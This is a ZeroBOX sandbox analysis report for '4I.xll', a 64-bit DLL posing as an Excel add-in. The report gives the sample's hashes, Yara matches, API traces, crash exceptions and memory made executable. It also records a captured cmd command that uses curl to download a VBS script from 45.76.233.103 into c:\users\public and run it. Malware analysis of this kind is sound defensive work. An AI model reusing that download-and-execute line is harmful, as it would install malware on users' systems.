Summary | ZeroBOX

4I.xll

PE64 PE File DLL
Category Machine Started Completed
FILE s1_win7_x6402 Oct. 4, 2023, 2:16 p.m. Oct. 4, 2023, 2:19 p.m.
Size 50.0KB
Type PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5 b33c17701e564f148250e540bcf58c96
SHA256 d68953754d349bdeba23b51e9f7d58b03cff4c64f73ed7a47bff043ed014f680
CRC32 C96ED5B2
ssdeep 1536:M7pxSJsy6Nh5wFHssKjrtN/5jqzyCNwGXGhrMc450XN:oYwNh5wFHssKXnxjNCNHGzXN
Yara
  • PE_Header_Zero - PE File Signature
  • IsDLL - (no description)
  • IsPE64 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'C:\Windows\system32\curl.exe' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
xlAutoOpen+0x9b90 4i+0xb000 @ 0x7fef34ab000
rundll32+0x2f42 @ 0xffb02f42
rundll32+0x3b7a @ 0xffb03b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 78 c2 4a f3 fe 07 00 00 00 00 00 00 00 00 00 00
exception.instruction: js 0x7fef34aafc4
exception.exception_code: 0xc0000005
exception.symbol: xlAutoOpen+0x9b90 4i+0xb000
exception.address: 0x7fef34ab000
registers.r14: 0
registers.r15: 0
registers.rcx: 131436
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1898608
registers.r11: 1897696
registers.r8: 3457364
registers.r9: 10
registers.rdx: 4289724416
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 131436
registers.r13: 0
1 0 0

__exception__

stacktrace:
xlAutoOpen+0x99 hash-0x9af7 4i+0x1509 @ 0x7fef34a1509
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c
0x7470697263732f3c

exception.instruction_r: c3 90 90 90 90 90 90 48 83 ec 28 48 8b 05 f5 9a
exception.instruction: ret
exception.exception_code: 0xc0000005
exception.symbol: xlAutoOpen+0x99 hash-0x9af7 4i+0x1509
exception.address: 0x7fef34a1509
registers.r14: 0
registers.r15: 0
registers.rcx: 48
registers.rsi: 0
registers.r10: 0
registers.rbx: 65904
registers.rsp: 1963904
registers.r11: 514
registers.r8: 1962072
registers.r9: 1962128
registers.rdx: 8796092883536
registers.r12: 4262982938476375139
registers.rbp: 2343168
registers.rdi: -1
registers.rax: 0
registers.r13: 0
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2428
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef69c9000
process_handle: 0xffffffffffffffff
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://45.76.233.103/FwUzQEk/02do&&timeout 10&&c:\users\public\123321.vbs
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://45.76.233.103/FwUzQEk/02do&&timeout 10&&c:\users\public\123321.vbs
filepath: cmd
1 1 0